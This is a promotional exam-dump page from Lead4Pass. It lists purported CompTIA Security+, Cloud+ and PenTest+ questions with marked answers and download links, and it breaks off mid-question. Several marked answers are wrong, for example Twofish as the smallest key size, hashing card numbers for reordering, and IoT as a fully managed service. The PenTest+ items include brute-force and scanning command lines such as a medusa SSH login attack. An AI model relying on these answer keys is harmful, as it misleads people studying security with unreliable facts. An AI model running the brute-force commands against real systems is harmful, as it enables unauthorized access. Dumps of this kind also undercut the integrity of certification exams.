[Aug-2021 Updated] CompTIA SY0-601 Brain Dumps Update includes PDF and VCE from Lead4Pass

The latest updated and revised CompTIA SY0-601 exam questions and answers come from Lead4Pass! Complete CompTIA SY0-601 dumps certification questions!
Welcome to download the latest Lead4Pass CompTIA SY0-601 dumps with PDF and VCE: https://www.leads4pass.com/sy0-601.html (401 Q&A)

[CompTIA SY0-601 dumps pdf] CompTIA SY0-601 dumps PDF uploaded from Braindump4it, online download provided by the latest update of Lead4pass:
https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-Security-Plus-SY0-601-Exam-Dumps-Braindumps-PDF-VCE.pdf

Latest update CompTIA SY0-601 exam questions and answers online practice test

QUESTION 1
A document that appears to be malicious has been discovered in an email that was sent to a company\\’s Chief
Financial Officer (CFO). Which of the following would be BEST to allow a security analyst to gather information and
confirm it is a malicious document without executing any code it may contain?
A. Open the document on an air-gapped network
B. View the document\\’s metadata for origin clues
C. Search for matching file hashes on malware websites D. Detonate the document in an analysis sandbox
Correct Answer: D

 

QUESTION 2
A smart retail business has a local store and a newly established and growing online storefront. A recent storm caused
a power outage to the business and the local ISP, resulting in several hours of lost sales and delayed order processing.
The business owner now needs to ensure two things:
1.
Protection from power outages
2.
Always-available connectivity In case of an outage
The owner has decided to implement battery backups for the computer equipment Which of the following would BEST
fulfill the owner\\’s second need?
A. Lease a point-to-point circuit to provide dedicated access.
B. Connect the business router to its own dedicated UPS.
C. Purchase services from a cloud provider for high availability
D. Replace the business\\’s wired network with a wireless network.
Correct Answer: C

 

QUESTION 3
A security analyst has been asked to investigate a situation after the SOC started to receive alerts from the SIEM. The
analyst first looks at the domain controller and finds the following events:comptia sy0-601 exam questions q3

To better understand what is going on, the analyst runs a command and receives the following output:

comptia sy0-601 exam questions q3-1

Based on the analyst\\’s findings, which of the following attacks is being executed?
A. Credential harvesting
B. Keylogger
C. Brute-force
D. Spraying
Correct Answer: D

 

QUESTION 4
Phishing and spear-phishing attacks have been occurring more frequently against a company\\’s staff. Which of the
following would MOST likely help mitigate this issue?
A. DNSSEC and DMARC
B. DNS query logging
C. Exact mail exchanger records in the DNS
D. The addition of DNS conditional forwarders
Correct Answer: C


QUESTION 5
A security analyst is reviewing information regarding recent vulnerabilities. Which of the following will the analyst MOST
likely consult to validate which platforms have been affected?
A. OSINT
B. SIEM
C. CVSS
D. CVE
Correct Answer: D

 

QUESTION 6
A local coffee shop runs a small WiFi hotspot for its customers that utilizes WPA2-PSK. The coffee shop would like to
stay current with security trends and wants to implement WPA3 to make its WiFi even more secure. Which of the
following technologies will the coffee shop MOST likely use in place of PSK?
A. WEP
B. MSCHAP
C. WPS
D. SAE
Correct Answer: D

 

QUESTION 7
A security analyst is investigating an incident that was first reported as an issue connecting to network shares and the
Internet. While reviewing logs and tool output, the analyst sees the following:comptia sy0-601 exam questions q7

Which of the following attacks has occurred?
A. IP conflict
B. Pass-the-hash
C. MAC flooding
D. Directory traversal
E. ARP poisoning
Correct Answer: E

 

QUESTION 8
A website developer is working on a new e-commerce website and has asked an information security expert for the
most appropriate way to store credit card numbers to create an easy reordering process. Which of the following
methods would BEST accomplish this goal?
A. Salting the magnetic strip information
B. Encrypting the credit card information in transit.
C. Hashing the credit card numbers upon entry.
D. Tokenizing the credit cards in the database
Correct Answer: C

 

QUESTION 9
A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be nondisruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA?
A. One-time passwords
B. Email tokens
C. Push notifications D. Hardware authentication
Correct Answer: C

 

QUESTION 10
After reading a security bulletin, a network security manager is concerned that a malicious actor may have breached the
network using the same software flaw. The exploit code is publicly available and has been reported as being used
against other industries in the same vertical. Which of the following should the network security manager consult FIRST
to determine a priority list for forensic review?
A. The vulnerability scan output
B. The IDS logs
C. The full packet capture data
D. The SIEM alerts
Correct Answer: A

 

QUESTION 11
A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are
occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow
speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when
laptop users return desks after using their devices in other areas of the building. There have also been reports of users
being required to enter their credentials on web pages in order to gain access to them. Which of the following is the
MOST likely cause of this issue?
A. An external access point is engaging in an evil-twin attack.
B. The signal on the WAP needs to be increased in that section of the building.
C. The certificates have expired on the devices and need to be reinstalled.
D. The users in that section of the building are on a VLAN that is being blocked by the firewall.
Correct Answer: A

 

QUESTION 12
A cybersecurity department purchased o new PAM solution. The team is planning to randomize the service account
credentials of the Windows server first. Which of the following would be the BEST method to increase the security on
the Linux server?
A. Randomize the shared credentials
B. Use only guest accounts to connect.
C. Use SSH keys and remove generic passwords
D. Remove all user accounts.
Correct Answer: C

 

QUESTION 13
Which of the following algorithms has the SMALLEST key size?
A. DES
B. Twofish
C. RSA
D. AES
Correct Answer: B

 

QUESTION 14
A network administrator needs to build out a new datacenter, with a focus on resiliency and uptime. Which of the
following would BEST meet this objective? (Choose two.)
A. Dual power supply
B. Off-site backups
C. Automatic OS upgrades
D. NIC teaming
E. Scheduled penetration testing
F. Network-attached storage
Correct Answer: AB

 

QUESTION 15
Which of the following would be BEST to establish between organizations that have agreed cooperate and are engaged
in early discussion to define the responsibilities of each party, but do not want to establish a contractually binding
agreement?
A. An SLA
B. AnNDA
C. ABPA
D. AnMOU
Correct Answer: D


Update the latest valid CompTIA SY0-601 test questions and answers throughout the year.
Upload the latest SY0-601 exam practice questions and SY0-601 PDF for free every month. Get the complete SY0-601 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass SY0-601 Dumps (including PDF and VCE),
please visit: https://www.leads4pass.com/sy0-601.html (PDF + VCE)

ps. Get free CompTIA SY0-601 dumps PDF online: https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-Security-Plus-SY0-601-Exam-Dumps-Braindumps-PDF-VCE.pdf

[Aug-2021 Updated] CompTIA SY0-501 Brain Dumps Update includes PDF and VCE from Lead4Pass

The latest updated and revised CompTIA SY0-501 exam questions and answers come from Lead4Pass! Complete CompTIA SY0-501 dumps certification questions!
Welcome to download the latest Lead4Pass CompTIA SY0-501 dumps with PDF and VCE: https://www.leads4pass.com/sy0-501.html (1423 Q&A)

[CompTIA SY0-501 dumps pdf] CompTIA SY0-501 dumps PDF uploaded from Braindump4it, online download provided by the latest update of Lead4pass:
https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-Security-Plus-SY0-501-Exam-Dumps-Braindumps-PDF-VCE.pdf

Latest update CompTIA SY0-501 exam questions and answers online practice test

QUESTION 1
A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate mobile
devices prior to providing the user with a captive portal login. Which of the following should the systems administrator
configure?
A. L2TP with MAC filtering
B. EAP-TTLS
C. WPA2-CCMP with PSK
D. RADIUS federation
Correct Answer: D
RADIUS generally includes 802.1X that pre-authenticates devices.

 

QUESTION 2
An attacker captures the encrypted communication between two parties for a week, but is unable to decrypt the
messages. The attacker then compromises the session key during one exchange and successfully compromises a
single message. The attacker plans to use this key to decrypt previously captured and future communications, but is
unable to. This is because the encryption scheme in use adheres to:
A. Asymmetric encryption
B. Out-of-band key exchange
C. Perfect forward secrecy
D. Secure key escrow
Correct Answer: C

 

QUESTION 3
A security administrator is implementing a new WAF solution and has placed some of the web servers behind the WAF,
with the WAF set to audit mode. When reviewing the audit logs of external requests and posts to the web servers, the
administrator finds the following entry:comptia sy0-501 exam questions q3

Based on this data, which of the following actions should the administrator take?
A. Alert the web server administrators to a misconfiguration.
B. Create a blocking policy based on the parameter values.
C. Change the parameter name `Account_Name\\’ identified in the log.
D. Create an alert to generate emails for abnormally high activity.
Correct Answer: D

 

QUESTION 4
An organization would like to set up a more robust network access system. The network administrator suggests the
organization move to a certificate-based authentication setup in which a client-side certificate is used while connecting.
Which of the following EAP types should be used to meet these criteria?
A. EAP-TLS
B. EAP-FAST
C. EAP-MD5
D. EAP-TTLS
Correct Answer: A

 

QUESTION 5
A security analyst wants to verify that a client-server (non-web) application is sending encrypted traffic. Which of the
following should the analyst use?
A. openssl
B. hping
C. netcat
D. tcpdump
Correct Answer: D

 

QUESTION 6
A security analyst is determining the point of compromise after a company was hacked. The analyst checks the server
logs and sees that a user account was logged in at night, and several large compressed files were exfiltrated. The
analyst then discovers the user last logged in four years ago and was terminated. Which of the following should the
security analyst recommend to prevent this type of attack in the future? (Choose two.)
A. Review and update the firewall settings
B. Restrict the compromised user account
C. Disable all user accounts that are not logged in to for 180 days
D. Enable a login banner prohibiting unauthorized use
E. Perform an audit of all company user accounts
F. Create a honeypot to catch the hacker
Correct Answer: BE

 

QUESTION 7
An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential incidents in
the company. The vertical axis indicates the likelihood or an incident, while the horizontal axis indicates the impact.comptia sy0-501 exam questions q7

Which of the following is this table an example of?
A. Internal threat assessment
B. Privacy impact assessment
C. Qualitative risk assessment
D. Supply chain assessment
Correct Answer: C

 

QUESTION 8
An organization\\’s employees currently use three different sets of credentials to access multiple internal resources.
Management wants to make this process less complex. Which of the following would be the BEST option to meet this
goal?
A. Transitive trust
B. Single sign-on
C. Federation
D. Secure token
Correct Answer: B

 

QUESTION 9
For each of the given items, select the appropriate authentication category from the drop down choices.comptia sy0-501 exam questions q9

Select the appropriate authentication type for the following items:
Hot Area:

comptia sy0-501 exam questions q9-1

Correct Answer:

comptia sy0-501 exam questions q9-2

Biometrics refers to a collection of physical attributes of the human body that can be used as identification or an
authentication factor. Fingerprints and retinas are physical attributes of the human body.
Two types of tokens exist, Time-based one-time password (TOTP) tokens and HMACbased one-time password
(HOTP). TOTP tokens generate passwords at fixed time intervals, whereas HOTP tokens generate passwords not
based on fixed
time intervals but instead based on a non-repeating one-way function, such as a hash or HMAC operation.
Smart cards can have Multi-factor and proximity authentication embedded into it.
PAP allows for two entities to share a password in advance and use the password as the basis of authentication. The
same goes for PIN numbers.
References:
Stewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, pp. 282, 285
http://en.wikipedia.org/wiki/Password_authentication_protocol#Working_cycle
http://en.wikipedia.org/wiki/Smart_card#Security

 

QUESTION 10
An organization has the following password policies:
Passwords must be at least 16 characters long.
A password cannot be the same as any previous 20 passwords.
Three failed login attempts will lock the account for five minutes.
Passwords must have one uppercase letter, one lowercase letter, and one non- alphanumeric symbol.
A database server was recently breached, and the incident response team suspects the passwords were compromised.
Users with permission on that database server were forced to change their passwords for that server. Unauthorized and
suspicious logins are now being detected on a completely separate server. Which of the following is MOST likely the
issue and the best solution?
A. Some users are reusing passwords for different systems; the organization should scan for password reuse across
systems.
B. The organization has improperly configured single sign-on; the organization should implement a RADIUS server to
control account logins.
C. User passwords are not sufficiently long or complex: the organization should increase the complexity and length
requirements for passwords.
D. The trust relationship between the two servers has been compromised: the organization should place each server on
a separate VLAN.
Correct Answer: A


QUESTION 11
Which of the following BEST explains the difference between a credentialed scan and a non- credentialed scan?
A. A credentialed scan sees devices in the network, including those behind NAT, while a non- credentialed scan sees
outward-facing applications.
B. A credentialed scan will not show up in system logs because the scan is running with the necessary authorization,
while non-credentialed scan activity will appear in the logs.
C. A credentialed scan generates significantly more false positives, while a non-credentialed scan generates fewer false
positives
D. A credentialed scan sees the system the way an authorized user sees the system, while a non- credentialed scan
sees the system as a guest.
Correct Answer: D

 

QUESTION 12
Which of the following controls does a mantrap BEST represent?
A. Deterrent
B. Detective
C. Physical
D. Corrective
Correct Answer: C

 

QUESTION 13
A recent internal audit is forcing a company to review each internal business unit\\’s VMs because the cluster they are
installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?
A. Buffer overflow
B. End-of-life systems
C. System sprawl
D. Weak configuration
Correct Answer: C

 

QUESTION 14
A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of
users jailbreaking mobile devices?
A. Install a corporately monitored mobile antivirus on the devices.
B. Prevent the installation of applications from a third-party application store.
C. Build a custom ROM that can prevent jailbreaking.
D. Require applications to be digitally signed.
Correct Answer: D

 

QUESTION 15
An audit has revealed that database administrators are also responsible for auditing database changes and backup
logs. Which of the following access control methodologies would BEST mitigate this concern?
A. Time of day restrictions
B. Principle of least privilege
C. Role-based access control
D. Separation of duties
Correct Answer: D


Update the latest valid CompTIA SY0-501 test questions and answers throughout the year.
Upload the latest SY0-501 exam practice questions and SY0-501 PDF for free every month. Get the complete SY0-501 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass SY0-501 Dumps (including PDF and VCE),
please visit: https://www.leads4pass.com/sy0-501.html (PDF + VCE)

ps. Get free CompTIA SY0-501 dumps PDF online: https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-Security-Plus-SY0-501-Exam-Dumps-Braindumps-PDF-VCE.pdf

[Aug-2021 Updated] CompTIA CV0-003 Brain Dumps Update includes PDF and VCE from Lead4Pass

The latest updated and revised CompTIA CV0-003 exam questions and answers come from Lead4Pass! Complete CompTIA CV0-003 dumps certification questions!
Welcome to download the latest Lead4Pass CompTIA CV0-003 dumps with PDF and VCE: https://www.leads4pass.com/cv0-003.html (142 Q&A)

[CompTIA CV0-003 dumps pdf] CompTIA CV0-003 dumps PDF uploaded from Braindump4it, online download provided by the latest update of Lead4pass:
https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-Cloud-Plus-CV0-003-Exam-Dumps-Braindumps-PDF-VCE.pdf

Latest update CompTIA CV0-003 exam questions and answers online practice test

QUESTION 1
Given the metric below:comptia cv0-003 exam questions q1

Using iSCSI storage reports across three datacenters, which of the following recorded metrics indicates an anomaly in
the performance?
A. Disk latency
B. CPU utilization
C. WAN latency
D. RAM utilization
Correct Answer: D

 

QUESTION 2
A cloud administrator is switching hosting companies and using the same script that was previously used to deploy VMs
in the new cloud. The script is returning errors that the command was not found. Which of the following is the MOST
likely cause of the script failure?
A. Account mismatches
B. IP address changes
C. API version incompatibility
D. Server name changes
Correct Answer: C

 

QUESTION 3
A global web-hosting company is concerned about the availability of its platform during an upcoming event. Web traffic
is forecasted to increase substantially during the next week. The site contains mainly static content. Which of the
following solutions will assist with the increased workload?
A. DoH
B. WAF
C. IPS
D. CDN
Correct Answer: D
Reference: https://www.globaldots.com/content-delivery-network-explained

 

QUESTION 4
A systems administrator disabled TLS 1.0 and 1.1, as well as RC4, 3DES, and AES-128 ciphers for TLS 1.2, on a web
server. A client now reports being unable to access the web server, but the administrator verifies that the server is
online,
the web service is running, and other users can reach the server as well.
Which of the following should the administrator recommend the user do FIRST?
A. Disable antivirus/anti-malware software
B. Turn off the software firewall
C. Establish a VPN tunnel between the computer and the web server
D. Update the web browser to the latest version
Correct Answer: B

 

QUESTION 5
A systems administrator recently deployed a VDI solution in a cloud environment; however, users are now experiencing
poor rendering performance when trying to display 3-D content on their virtual desktops, especially at peak times. Which
of the following actions will MOST likely solve this issue?
A. Update the quest graphics drivers from the official repository
B. Add more vGPU licenses to the host
C. Instruct users to access virtual workstations only on the VLAN
D. Select vGPU profiles with higher video RAM
Correct Answer: D
Reference:
https://www.cisco.com/c/dam/en/us/solutions/collateral/data-center-virtualization/desktop-virtualization-solutionsvmware-horizon-view/whitepaper-c11-741606.pdf


QUESTION 6
A company recently experienced a power outage that lasted 30 minutes. During this time, a whole rack of servers was
inaccessible, even though the servers did not lose power. Which of the following should be investigated FIRST?
A. Server power
B. Rack power
C. Switch power
D. SAN power
Correct Answer: C

 

QUESTION 7
A web server has been deployed in a public IaaS provider and has been assigned the public IP address of
72.135.10.100. Users are now reporting that when they browse to the website, they receive a message indicating the
service is
unavailable. The cloud administrator logs into the server, runs a netstat command,
and notices the following relevant output:comptia cv0-003 exam questions q7

Which of the following actions should the cloud administrator take to resolve the issue?
A. Assign a new IP address of 192.168.100.10 to the web server
B. Modify the firewall on 72.135.10.100 to allow only UDP
C. Configure the WAF to filter requests from 17.3.130.3
D. Update the gateway on the web server to use 72.135.10.1
Correct Answer: D

 

QUESTION 8
An administrator is implementing a private cloud that will be used as a test environment. To limit the number of guests
per subnet to a maximum of 14, the administrator implemented a /20 network. Which of the following should the
administrator use to assign the networks?
A. DHCP
B. Subnet
C. VLAN
D. Gateway
Correct Answer: A

 

QUESTION 9
A software company recently moved all of its development testing to a public cloud environment. The company primarily
uses IaaS to deploy and test its code. The company needs the software developers to be more agile and efficient when
testing application code. Which of the following backup types should the developers use to BEST ensure the speedy
recovery of a system if it is damaged?
A. Snapshots
B. Full
C. Incremental
D. Differential
Correct Answer: C

 

QUESTION 10
A cloud architect wants to minimize the risk of having systems administrators in an IaaS compute instance perform
application code changes. The development group should be the only group allowed to modify files in the directory.
Which of the following will accomplish the desired objective?
A. Remove the file write permissions for the application service account.
B. Restrict the file write permissions to the development group only.
C. Add access to the fileshare for the systems administrator\\’s group.
D. Deny access to all development user accounts
Correct Answer: B

 

QUESTION 11
A software development manager is looking for a solution that will allow a team of developers to work in isolated
environments that can be spun up and torn down quickly. Which of the following is the MOST appropriate solution?
A. Containers
B. File subscriptions
C. Ballooning
D. Software-defined storage
Correct Answer: A

 

QUESTION 12
Which of the following cloud services is fully managed?
A. IaaS
B. GPU in the cloud
C. IoT
D. Serverless compute
E. SaaS
Correct Answer: C
Reference: https://developers.google.com/iot

 

QUESTION 13
A company has developed a cloud-ready application. Before deployment, an administrator needs to select a deployment
technology that provides a high level of portability and is lightweight in terms of footprint and resource requirements.
Which of the following solutions will be BEST to help the administrator achieve the requirements?
A. Containers
B. Infrastructure as code
C. Desktop virtualization
D. Virtual machines
Correct Answer: A
Reference: https://blog.netapp.com/blogs/containers-vs-vms/

 

QUESTION 14
An organization is hosting a DNS domain with private and public IP ranges. Which of the following should be
implemented to achieve ease of management?
A. Network peering
B. A CDN solution
C. A SDN solution
D. An IPAM solution
Correct Answer: D
Reference: https://www.infoblox.com/glossary/ipam-ip-address-management/

 

QUESTION 15
An organization purchased new servers with GPUs for render farms. The servers have limited CPU resources. Which of
the following GPU configurations will be the MOST optimal for virtualizing this environment?
A. Dedicated
B. Shared
C. Passthrough
D. vGPU
Correct Answer: D


Update the latest valid CompTIA CV0-003 test questions and answers throughout the year.
Upload the latest CV0-003 exam practice questions and CV0-003 PDF for free every month. Get the complete CV0-003 Brain Dumps,
the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass CV0-003 Dumps (including PDF and VCE),
please visit: https://www.leads4pass.com/cv0-003.html (PDF + VCE)

ps. Get free CompTIA CV0-003 dumps PDF online: https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-Cloud-Plus-CV0-003-Exam-Dumps-Braindumps-PDF-VCE.pdf

[Aug-2021 Updated] CompTIA CV0-002 Brain Dumps Update includes PDF and VCE from Lead4Pass

The latest updated and revised CompTIA CV0-002 exam questions and answers come from Lead4Pass! Complete CompTIA CV0-002 dumps certification questions!
Welcome to download the latest Lead4Pass CompTIA CV0-002 dumps with PDF and VCE: https://www.leads4pass.com/cv0-002.html (491 Q&A)

[CompTIA CV0-002 dumps pdf] CompTIA CV0-002 dumps PDF uploaded from Braindump4it, online download provided by the latest update of Lead4pass:
https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-Cloud-Plus-CV0-002-Exam-Dumps-Braindumps-PDF-VCE.pdf

Latest update CompTIA CV0-002 exam questions and answers online practice test

QUESTION 1
A server hosting file shares is an example of which of the following types of storage?
A. SAN
B. NAS
C. SATA
D. SAS
Correct Answer: B

 

QUESTION 2
A company moved its on-premises applications to several SaaS providers. As a result, the security team is concerned
about accounts being compromised. Which of the following should the security tem implement to reduce this risk?
A. Multifactor authentication
B. Single sign-on
C. Federation
D. Role-based access control
E. Virtual private network
Correct Answer: D

 

QUESTION 3
A company is interested in a DRP. The purpose of the plan is to recover business as soon as possible. The MOST
effective technique is:
A. archiving.
B. network clustering.
C. site mirroring.
D. active/active.
Correct Answer: D

 

QUESTION 4
A hospital is deploying a web-based application in its private cloud to service multiple facilities in a region. This
application is used by employees of the hospital, as well as the patients and their families. Which of the following
security configurations is MOST likely to be deployed to secure the information from the application?
A. IPSec
B. PPTP
C. L2TP
D. SSL/TLS
Correct Answer: D

 

QUESTION 5
Based on demand, an IaaS provider wants to deploy a security application for its customers. Which of the following is
the BEST technique for the IaaS provider to apply this to target systems?
A. Vendor application
B. Scripting
C. Orchestration
D. Custom programming
Correct Answer: C

 

QUESTION 6
A company requires all system logs to be saved for a minimum 30 days. However, many employees are reporting
storage near capacity alerts. A cloud administrator is trying to fix and prevent this issue from happening again. Which of
the following is the BEST option?
A. Automate log deletion for logs older than 30 days. This job should run every day to clean up.
B. Automate archiving of the logs older than 30 days, and create a scheduled job to clean up daily logs older than 30
days
C. Automate migration of the log archiving storage to offline backup, and create a job to check and delete logs every 30
days.
D. Automate the clearing of the logs older than 30 days, and add more capacity to the log file storage.
Correct Answer: A

 

QUESTION 7
The development team of an e-commerce organization is migrating its code libraries to a public IaaS cloud provider, and
the security policy states that source code must use multiple security controls to secure and restrict access. Which of
the following combinations of controls would be BEST to meet the requirements?
A. Use directory federation across the organization for all users and biometric access on the developers\\’ laptop instead
of VPN.
B. Use VPN and two-factor authentication for the developers to access the online repositories for remote developers.
C. Use SSO across the organization and an existing data loss prevention solution to prevent code repository leakage.
D. Use a third-party CASB solution that sets policies to detect potential compromise of code libraries.
Correct Answer: B

 

QUESTION 8
A cloud administrator is securing an application hosted by an IaaS provider. The operating system on the VM has been
updated. Which of the following should the administrator use to BEST secure the VM from attacks against vulnerable
services regardless of operating system?
A. Firewall
B. Antivirus
C. Intrusion detection
D. Patch management
Correct Answer: C

 

QUESTION 9
An organization allows clients to retrieve information on earthquake events. This is a description of which of the
following classifications?
A. XaaS
B. DaaS
C. CaaS
D. SaaS
Correct Answer: A

 

QUESTION 10
A financial services company has a requirement to keep backups on premises for 30 days and off-site for up to seven
years to a location that is within 100mi (161km) of the primary datacenter location. Recovery times for backups kept onsite have an RTO of one hour, while recovery times for backups kept off-site have an RTO of four hours. Which of the
following solutions BEST solves this requirement?
A. Implement a full-based backup and recovery solution for backups within 30 days or less. For backups kept longer
than 30 days, migrate them to a cloud provider that will host the data within 100mi (161km) of the financial services
company\\’s primary datacenter.
B. Implement a clone-based backup and recovery solution for backups within 30 days or less. For backups kept longer
than 30 days, migrate them to a cloud provider that will host the data within 100mi (161km) of the financial services
company\\’s primary datacenter.
C. Implement an incremental-based backup and recovery solution for backups within 30 days or less. For backups kept
longer than 30 days, migrate them to a cloud provider that will host the data within 62mi (100km) of the financial
services company\\’s primary datacenter.
D. Implement a snapshot-based backup and recovery solution for backups within 30 days or less. For backups kept
longer than 30 days, migrate them to a cloud provider that will host the data within 100mi (161km) of the financial
services company\\’s primary datacenter.
Correct Answer: B

 

QUESTION 11
A cloud engineer is migrating an application running on an on-premises server to a SaaS solution. The cloud engineer
has validated the SaaS solution, as well as created and tested a migration plan. Which of the following should the cloud
engineer do before performing the migration? (Choose two.)
A. Document in the change management database.
B. Document the test findings.
C. Gain approval from the CAB.
D. Create a rollback plan.
E. Submit a request for change.
F. Agree upon a change windows.
G. Establish a plan of action.
Correct Answer: DG

 

QUESTION 12
A company has just established a new branch office that needs to connect back to centrally hosted applications for day
to day operations. The branch office has noted that access to many company services are slow and causing a drop in
productivity. The company IT department has investigated a plan to improve performance across the link to the branch
office without having to pay for more bandwidth from the Internet Service Provider. This plan includes hardware that
after installation will allow for much faster access to day to day business applications. Which of the following terms
BEST describes the action taken by the IT department?
A. LAN optimization
B. WAN optimization
C. Load balancing
D. Bandwidth compression
Correct Answer: B

 

QUESTION 13
A recent advertisement campaign has increased traffic to an e-commerce application that is hosted within a public cloud
environment. Customers are reporting that it takes too long to load their pages and submit orders. A cloud administrator
looks at the metrics from the environment and sees high utilization of the CPU and memory resources. The cloud
provider offers several preconfigured sizes for server template: x-small, small, medium, large, x-large, and 2x-large.comptia cv0-002 exam questions q13

Given an expected increase in workload, which of the following is the BEST solution to improve application
performance?
A. Change the server template size for Inxpc003 to 2x-large.
B. Provision additional Inxpc servers using the 2x-large template.
C. Add memory to Inxpc002, Inxpc003, and Inxpc003.
D. Change the role of Inxw001 from web to application.
Correct Answer: A

 

QUESTION 14
A cloud administrator for a state government agency is tasked with giving access to the voter registration application to
a government agency in another state. Only authorized officials from each state should access the application. These
agencies have a common environment where applications have been deployed in the past. Which of the following
should the cloud administrator do to give access to the application?
A. Deploy part of the application into a public cloud and establish secure connections to a private cloud environment.
B. Deploy the application to a community cloud that is shared with multiple state government agencies only.
C. Deploy the application to a public cloud and implement ACLs and security access policies to limit access.
D. Deploy the application to the state\\’s private cloud and give authentication credentials to the other state\\’s
authorized officials.
Correct Answer: C


QUESTION 15
A cloud engineer is required to ensure all servers in the cloud environment meet requirements for PCI compliance. One
of the requirements is to make certain all administrator logins and commands are logged. Which of the following is the
BEST approach to meet these requirements?
A. Enable configuration change tracking for all servers in the public cloud provider\\’s dashboard.
B. Enable detailed monitoring for all servers in the public cloud provider\\’s dashboard.
C. Define and enable audit tracking rules on each server in the public cloud environment.
D. Modify the cloud provider\\’s role-based authorization policies to log user session activity.
Correct Answer: A


Update the latest valid CompTIA CV0-002 test questions and answers throughout the year.
Upload the latest CV0-002 exam practice questions and CV0-002 PDF for free every month. Get the complete CV0-002 Brain Dumps, the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass CV0-002 Dumps (including PDF and VCE),
please visit: https://www.leads4pass.com/cv0-002.html (PDF + VCE)

ps. Get free CompTIA CV0-002 dumps PDF online: https://www.braindump4it.com/wp-content/uploads/2021/07/Lead4pass-CompTIA-Cloud-Plus-CV0-002-Exam-Dumps-Braindumps-PDF-VCE.pdf

[July-2021 Updated] CompTIA PT0-001 Brain Dumps Update includes PDF and VCE from Lead4Pass

The latest updated and revised CompTIA PT0-001 exam questions and answers come from Lead4Pass! Complete CompTIA PT0-001 dumps certification questions!
Welcome to download the latest Lead4Pass CompTIA PT0-001 dumps with PDF and VCE: https://www.leads4pass.com/pt0-001.html (258 Q&A)

[CompTIA PT0-001 dumps pdf] CompTIA PT0-001 dumps PDF uploaded from google drive, online download provided by the latest update of Lead4pass:
https://drive.google.com/file/d/1DHqsHNHXdDwNVKJDECqB8p-YwM4rkz1t/

Latest update CompTIA PT0-001 exam questions and answers online practice test

QUESTION 1
A penetration tester is performing an annual security assessment for a repeat client The tester finds indicators of
previous compromise Which of the following would be the most logical steps to follow NEXT?
A. Report the incident to the tester\\’s immediate manager and follow up with the client immediately
B. Report the incident to the clients Chief Information Security Officer (CISO) immediately and alter the terms of
engagement accordingly
C. Report the incident to the client\\’s legal department and then follow up with the client\\’s security operations team
D. Make note of the anomaly, continue with the penetration testing and detail it in the final report
Correct Answer: A

 

QUESTION 2
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to
manage power generation and cooling. Which of the following is a consideration unique to such an environment that
must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
Correct Answer: A

 

QUESTION 3
A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following
command:
for m in {1..254..1};do ping -c 1 192.168.101.$m; done
Which of the following BEST describes the result of running this command?
A. Port scan
B. Service enumeration
C. Live host identification
D. Denial of service
Correct Answer: C

 

QUESTION 4
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically
engaging them?
A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim
Correct Answer: B

 

QUESTION 5
A company has engaged a penetration tester to perform an assessment for an application that resides in the
company\\’s DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester\\’s IP
address be whitelisted?
A. WAF
B. HIDS
C. NIDS
D. DLP
Correct Answer: C

 

QUESTION 6
A penetration tester is perform initial intelligence gathering on some remote hosts prior to conducting a vulnerability
A. The network is submitted as a /25 or greater and the tester needed to access hosts on two different subnets
B. The tester is trying to perform a more stealthy scan by including several bogus addresses
C. The scanning machine has several interfaces to balance the scan request across at the specified rate
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the
latter host.
Correct Answer: B


QUESTION 7
A penetration tester is reviewing the following output from a wireless sniffer:microsoft pt0-001 exam questions q7

Which of the following can be extrapolated from the above information?
A. Hardware vendor
B. Channel interference
C. Usernames
D. Key strength
Correct Answer: C

 

QUESTION 8
A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the
finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?
A. Ensure the scanner can make outbound DNS requests.
B. Ensure the scanner is configured to perform ARP resolution.
C. Ensure the scanner is configured to analyze IP hosts.
D. Ensure the scanner has the proper plug -ins loaded.
Correct Answer: A

 

QUESTION 9
A penetration tester ran an Nmap scan against a target and received the following output:microsoft pt0-001 exam questions q9

Which of the following commands would be best for the penetration tester to execute NEXT to discover any weaknesses
or vulnerabilities?
A. onesixtyone ? 192.168.121.1
B. enum4linux ? 192.168.121.1
C. snmpwalk ? public 192.168.121.1
D. medusa ? 192.168.121.1 ? users.txt ? passwords.txt ? ssh
Correct Answer: C

 

QUESTION 10
During a penetration test, a tester identifies traditional antivirus running on the exploited server. Which of the following
techniques would BEST ensure persistence in a post-exploitation phase?
A. Shell binary placed in C:\windows\temp
B. Modified daemons
C. New user creation
D. Backdoored executables
Correct Answer: B

 

QUESTION 11
A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique
to a credentialed scan?
A. Exploits for vulnerabilities found
B. Detailed service configurations
C. Unpatched third-party software
D. Weak access control configurations
Correct Answer: A

 

QUESTION 12
After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the
